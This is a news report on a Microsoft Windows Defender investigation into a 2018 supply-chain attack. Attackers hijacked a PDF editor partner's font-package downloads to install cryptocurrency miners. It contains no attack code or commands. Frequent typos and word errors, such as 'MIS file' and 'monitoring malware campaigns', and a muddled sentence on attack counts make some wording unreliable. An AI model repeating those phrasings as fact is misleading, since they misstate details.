It appears that the recent spate of state-backed supply attacks chain attacks, such as the costly NotPetya attack via Ukraine accounting firm, have inspired low-level cybercriminals to use the same tactics to spread malware at scale.
Microsoft’s Windows Defender Research team have outlined an “unusual” attack that exploited shared systems between an unnamed PDF editor application maker and one of its software partners that supplied fonts. The trick they used made the legitimate apps installer deliver a malicious files that installed multiple cryptocurrency miners, one of today’s favorite illicit money-makers.
Microsoft believes the supply-chain was corrupted for thee months between January and March 2018, but notes it was “limited in nature”.
Despite its narrow impact, Microsoft is worried that more supply chain attacks are on the way and that cryptocurrency remains a major means for monitoring malware campaigns.
Microsoft highlights that this attack did not appear to involve state-backed or sophisticated hackers but rather “petty cybercriminals” trying to turn a quick buck of other’s CPUs. The overall warning is that the supply chain is becoming a popular attack technique among cybercriminals.
Microsoft’s threat hunters began an probing the issue when similar infection patterns started emerging across different sets of machines. Its antivirus was detecting and blocking a coin mining process masquerading as pagefile.sys, which was being launched by a service named xbox-service.exe. Windows Defender ATP’s alert timeline showed that xbox-service.exe was installed by an installer package that was automatically downloaded from a suspicious remote server, the Windows Defender Team wrote.
Windows security researchers had no answers fo why xbox-service.exe and pagefile.sys files on the host, why box-service.exe was being launched with high privileges, and what network and process activities preceded xbox-service.exe’s launch.
But it later discovered that it was a software supply chain attack after detecting a malicious MIS file, a database files used by the Windows Installer,, that was secretly installed as part of an Asian font package.
The key advantage of concealing malware in installer programs is they gain full elevated system privileges on a machine, allowing them to freely make dangerous moves like running coin miners, Microsoft notes.
Microsoft, working with the affected PDF editor vendor, found that the vendor itself was not attacked, but that they depended on another software vendor that created and distributed font packages used by the app. This discovery allowed all parties to close off the attack vector.
What Microsoft is concerned about is that cybercriminals are learning from sophisticated attacker techniques that have used supply chain attacks in the past. And given that the attack exploited a second downstream supplier, the vendors could be affected.
“The attack required a certain level of reconnaissance: the attackers had to understand how the normal installation worked. They eventually found an unspecified weakness in the interactions between the app vendor and partner vendor that created an opportunity.
“The attackers figured out a way to hijack the installation chain of the MSI font packages by exploiting the weakness they found in the infrastructure. Thus, even if the app vendor was not compromised and was completely unaware of the situation, the app became the unexpected carrier of the malicious payload because the attackers were able to redirect downloads.”
The attack didn’t appear to be a man-in-the-middle attack or DNS hijack, but the attackers were nonetheless able to change what was downloaded by the app by pointing the download link to the attacker server.
“As a result, for a limited period, the link used by the app to download MSI font packages pointed to a domain name registered with a Ukrainian registrar in 2015 and pointing to a server hosted on a popular cloud platform provider. The app installer from the app vendor, still legitimate and not compromised, followed the hijacked links to the attackers’ replica server instead of the software partner’s server,” explained Microsoft’s malware researchers.
Microsoft also discovered that the payload tries to prevent the infected machine from communicated with update servers of PDF apps and security software, which would prevent it from big detected and removed.
The attackers also had plans to use Coinhive at some point so that infected machines would start mining Monero through browsers.
Supply chain attacks have remained rare over the past six years with only one discovered in 2011. By 2016 four were discovered and that jumped to 7 in 2017, among them the NotPetya attack, the backdoors version of Avast’s CCleaner, and a attack on a BitTorent client.
Microsoft’s own efforts to harden Windows 10 from more common browser, application and operating system attacks may be party to blame for the rise in supply chain attacks, it concedes, by forcing attackers to look for easier and cheaper methods to compromise machines.
On the flip-side, the advantage of supply chain attacks is that it can reach a large number of users in a short of amount of time. It also takes advantage of the interdependencies that have come to typify a software industry that rely on partners and often share vulnerable code.